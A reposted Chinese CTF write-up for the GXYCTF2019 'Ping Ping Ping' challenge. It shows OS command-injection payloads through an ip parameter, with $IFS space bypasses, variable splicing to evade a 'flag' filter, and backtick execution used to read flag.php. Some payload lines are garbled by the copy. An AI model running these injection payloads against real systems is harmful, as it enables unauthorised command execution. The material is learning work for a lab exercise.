IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 十、[GXYCTF2019]Ping Ping Ping -> 正文阅读

[PHP知识库]十、[GXYCTF2019]Ping Ping Ping

1.打开题目
在这里插入图片描述

2.题目分析
① 加上题目是ping ping ping
所以可以猜测是需要我们命令执行读取flag
加上?ip=127.0.0.1
在这里插入图片描述

②  可以看到页面成功返回,我们尝试使用管道符执行我们想要执行的命令
?ip=127.0.0.1 | ls
在这里插入图片描述

③ 怀疑是空格的原因,去掉空格,改为
在这里插入图片描述

④ 目录下存在flag.php和index.php文件,尝试cat flag文件
考虑到之前的空格会被检测,我们绕过空格
绕过空格的思路一般有:
   I F S     IFS    IFS  {IFS}
  $IFS$1 // 1 改 成 1改成 1加其他数字貌似都行
  <
  <>
  {cat,flag.php} //用逗号实现了空格功能
  %20
  %09
我们这里使用 I F S , 即 构 造 ? i p = 127.0.0.1 ∣ c a t IFS,即构造?ip=127.0.0.1|cat IFS?ip=127.0.0.1catIFSflag.php
不过页面显示的错误信息改变:
在这里插入图片描述

⑤ 猜测是因为检测了flag,所以我们尝试先读取index.php
?ip=127.0.0.1|cat I F S i n d e x . p h p , 还 是 没 有 显 示 结 果 , 依 次 尝 试 : ? i p = 127.0.0.1 ∣ c a t IFSindex.php,还是没有显示结果,依次尝试:?ip=127.0.0.1|cat IFSindex.php?ip=127.0.0.1catIFS$1index.php成功
在这里插入图片描述

可以看到对我们的输入进行了过滤,在flag贪婪匹配里面我们不将flag连着写,就不会匹配到,同时可以看到有 a 变 量 , 尝 试 覆 盖 它 ⑥   变 量 拼 接 ? i p = 127.0.0.1 ; a = g ; c a t a变量,尝试覆盖它 ⑥ 变量拼接 ?ip=127.0.0.1;a=g;cat a ?ip=127.0.0.1;a=g;catIFS 1 f l a 1fla 1flaa.php
查看源代码里面就有flag
在这里插入图片描述在这里插入图片描述

另外我们可以尝试使用反引号内联执行的做法,linux下反引号``里面包含的就是需要执行的系统命令
而反引号里面的系统命令会先执行,成功执行后将结果传递给调用它的命令
?ip=127.0.0.1;cat$IFSls
在这里插入图片描述在这里插入图片描述

3.获取flag
flag{7bb90144-e9c0-4ca8-8936-783423ae95c7}

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-12-09 11:27:40  更:2021-12-09 11:28:02 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/27 21:18:28-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计